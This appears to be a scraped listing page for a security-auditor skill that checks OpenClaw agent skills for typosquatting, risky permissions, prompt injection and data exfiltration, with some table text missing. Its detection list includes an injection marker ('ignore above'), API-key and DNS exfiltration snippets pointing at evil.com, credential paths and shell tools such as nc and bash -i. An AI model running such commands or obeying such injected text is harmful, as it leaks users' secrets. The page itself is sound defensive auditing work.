Loading...
Loading...
Comprehensive security auditor for OpenClaw skills. Checks for typosquatting, dangerous permissions, prompt injection, supply chain risks, and data exfiltration patterns — before you install anything.
npx skill4agent add useai-pro/openclaw-skills-security skill-auditornameversiondescriptionauthor| Technique | Legitimate | Typosquat |
|---|---|---|
| Missing char | github-push | gihub-push |
| Extra char | lodash | lodashs |
| Char swap | code-reviewer | code-reveiw |
| Homoglyph | babel | babe1 (L→1) |
| Scope confusion | @types/node | @tyeps/node |
| Hyphen trick | react-dom | react_dom |
| Permission | Risk | Justification Required |
|---|---|---|
| Low | Almost always legitimate |
| Medium | Must explain what files are written |
| High | Must list exact endpoints |
| Critical | Must list exact commands |
| Combination | Risk | Why |
|---|---|---|
| CRITICAL | Read any file + send it out = exfiltration |
| CRITICAL | Execute commands + send output externally |
| HIGH | Modify system files + persist backdoors |
| All four permissions | CRITICAL | Full system access without justification |
fileReadnetwork + shellnpm installpip installgo getpostinstallpreinstallchild_processnetdnshttp<!-- ignore above -->networkhttp://185.143.x.x/fetch(url?key=${process.env.API_KEY})dns.resolve(${data}.evil.com)~/.ssh~/.aws~/.envcurlwgetncbash -i/**/*/etc/.bashrc.zshrcsudoSKILL AUDIT REPORT
==================
Skill: <name>
Author: <author>
Version: <version>
Source: <URL or local path>
VERDICT: SAFE / SUSPICIOUS / DANGEROUS / BLOCK
CHECKS:
[1] Metadata & typosquat: PASS / FAIL — <details>
[2] Permissions: PASS / WARN / FAIL — <details>
[3] Dependencies: PASS / WARN / FAIL / N/A — <details>
[4] Prompt injection: PASS / WARN / FAIL — <details>
[5] Network & exfil: PASS / WARN / FAIL / N/A — <details>
[6] Content red flags: PASS / WARN / FAIL — <details>
RED FLAGS: <count>
[CRITICAL] <finding>
[HIGH] <finding>
...
SAFE-RUN PLAN:
Network: none / restricted to <endpoints>
Sandbox: required / recommended
Paths: <allowed read/write paths>
RECOMMENDATION: install / review further / do not install